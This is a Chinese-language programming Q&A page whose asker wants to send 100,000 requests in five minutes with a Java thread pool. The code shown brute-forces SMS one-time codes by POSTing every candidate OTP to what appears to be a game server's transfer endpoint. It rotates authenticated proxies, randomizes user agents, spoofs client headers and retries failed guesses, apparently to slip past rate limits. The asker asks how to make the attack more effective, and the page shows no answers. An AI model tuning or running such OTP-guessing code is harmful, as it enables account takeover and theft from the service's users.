使用threadpoolexecutor在5分钟内发出100000个请求

g2ieeal7  于 2021-08-25  发布在  Java
关注(0)|答案(0)|浏览(378)

你认为有可能吗?我使用java.util.concurrent和java.net httpurlconnection对池中的每个线程发出请求。但a遇到了一个问题:
有些连接没有结束,并且它保持了该线程很长一段时间。我看到池没有终止,因为一些线程从未实现。
这需要大量的互联网性能,当互联网速度变慢时,几乎所有的请求都会遇到连接超时或读取超时异常。您有更好的解决方案吗。我尝试了不同步的lib,比如java reactive webflux、io.vertx.webclient,但没有更好。
以下是我的部分代码:

  1. public static void cancelMobile(User user, int split, int start, int end, String nickNameRecv, boolean useProxy, int timeout) {
  2. long startTime = System.currentTimeMillis();
  3. makeRandomOTPQueue(start, end);
  4. int size = 50000;//randomOTP.size();
  5. System.out.println("LUONG: " + split + " TOTAL: " + size);
  6. ArrayBlockingQueue<Runnable> workQueue = new ArrayBlockingQueue<>(size);
  7. RejectedExecutionHandler handler = new ThreadPoolExecutor.DiscardOldestPolicy();
  8. ThreadPoolExecutor threadPoolExecutor = /*(ThreadPoolExecutor) Executors.newCachedThreadPool();*/
  9. new ThreadPoolExecutor(split,
  10. 1000, Long.MAX_VALUE, TimeUnit.NANOSECONDS, workQueue, handler);
  11. ScheduledExecutorService scheduledThreadPoolExecutor = Executors.newScheduledThreadPool(split);
  12. threadPoolExecutor.allowCoreThreadTimeOut(false);
  13. List<TransferSMSOTP> transferSMSOTPList = new LinkedList<>();
  14. for (int j = 0; j < size; j++) {
  15. threadPoolExecutor.submit(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
  16. useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
  17. // scheduledThreadPoolExecutor.schedule(new TransferSMSOTP(user, String.valueOf(randomOTP.get(j)),
  18. // useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout),1000, TimeUnit.MILLISECONDS);
  19. }
  20. threadPoolExecutor.shutdown();
  21. while (!threadPoolExecutor.isTerminated()) {
  22. }
  23. ThreadPoolExecutor poolFail = new ThreadPoolExecutor(split,
  24. randomOTP.size(), 1, TimeUnit.MILLISECONDS, workQueue, handler);
  25. System.out.println("RETRY amount: " + failList.size());
  26. LinkedList<Integer> clone = failList;
  27. System.out.println("waiting pop fail otp");
  28. long backup = System.currentTimeMillis();
  29. for (int i = 0; i < clone.size(); i++) {
  30. try {
  31. poolFail.execute(new TransferSMSOTP(user, String.valueOf(clone.remove()),
  32. useProxy ? _Proxy.getRandomProxy(Main._proxy) : null, nickNameRecv, timeout));
  33. } catch (Exception e) {
  34. System.out.println("cannot pop: " + e.getMessage());
  35. }
  36. // if (System.currentTimeMillis() - backup > TimeUnit.MINUTES.toMillis(2)) {
  37. // System.out.println("Exit pop");
  38. // poolFail.shutdownNow();
  39. // }
  40. }
  41. poolFail.shutdown();
  42. System.out.println("waiting handle failed otp");
  43. while (!poolFail.isTerminated()) {
  44. if (System.currentTimeMillis() - startTime > TimeUnit.MINUTES.toMillis(5)) {
  45. System.out.println("Exit fail handle");
  46. poolFail.shutdownNow();
  47. // System.exit(0);
  48. break;
  49. }
  50. }
  51. System.out.println("UNHANDLED amount: " + failList.size() + ", total time of job: " + (System.currentTimeMillis() - startTime));
  52. }

在我的runnable类中:

  1. public void run() {
  2. try {
  3. String url = this.user.getServer().getUrlTransfer();
  4. Document data = new Document();
  5. data.put("nickNameRecv", this.nickNameRecv);
  6. data.put("otp", otp);
  7. String authorization = "Bearer " +
  8. this.user.getAuth();
  9. URL urlCon = new URL(url);
  10. HttpURLConnection connection;
  11. final String authUser = this._proxy.getProxyUserName();
  12. final String authPassword = this._proxy.getProxyPassword();
  13. Authenticator.setDefault(new ProxyAuthenticator(authUser, authPassword));
  14. Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(this._proxy.getProxyHost(), this._proxy.getProxyPort()));
  15. if (_proxy == null)
  16. connection = (HttpURLConnection) urlCon.openConnection();
  17. else
  18. connection = (HttpURLConnection) urlCon.openConnection(proxy);
  19. connection.setRequestMethod("POST");
  20. connection.setConnectTimeout(timeout);
  21. connection.setReadTimeout(timeout);
  22. connection.setRequestProperty(HttpHeaders.ACCEPT, ContentType.APPLICATION_JSON.toString());
  23. connection.setRequestProperty(HttpHeaders.CONTENT_TYPE, ContentType.APPLICATION_JSON.toString());
  24. connection.setRequestProperty(HttpHeaders.AUTHORIZATION, authorization);connection.setRequestProperty("client-browser", "Chrome 83");
  25. // connection.setRequestProperty("client-deviceid", rand(32, -1, "abcdef1234567890"));
  26. connection.setRequestProperty("client-operatingsystem", "Windows");
  27. String param = data.toJson();
  28. connection.setRequestProperty("Content-Length", String.valueOf(param.length()));
  29. connection.setRequestProperty(HttpHeaders.USER_AGENT, Main.agent.get(new Random().nextInt(Main.agent.size())));
  30. connection.setDoOutput(true);
  31. OutputStream outputStream = connection.getOutputStream();
  32. outputStream.write(param.getBytes());
  33. InputStream inputStream = connection.getInputStream();
  34. ObjectMapper mapper = new ObjectMapper();
  35. Map res = mapper.readValue(inputStream, Map.class);
  36. outputStream.close();
  37. inputStream.close();
  38. connection.disconnect();
  39. ProcessGame.done++;
  40. Main.f.updateResult();
  41. } catch (Exception e) {
  42. ProcessGame.failList.add(Integer.parseInt(this.otp));
  43. }
  44. }

我得到的最好结果是大约20000/99999请求获得http状态200。它有更好的解决方案吗?

暂无答案!

目前还没有任何答案,快来回答吧!

相关问题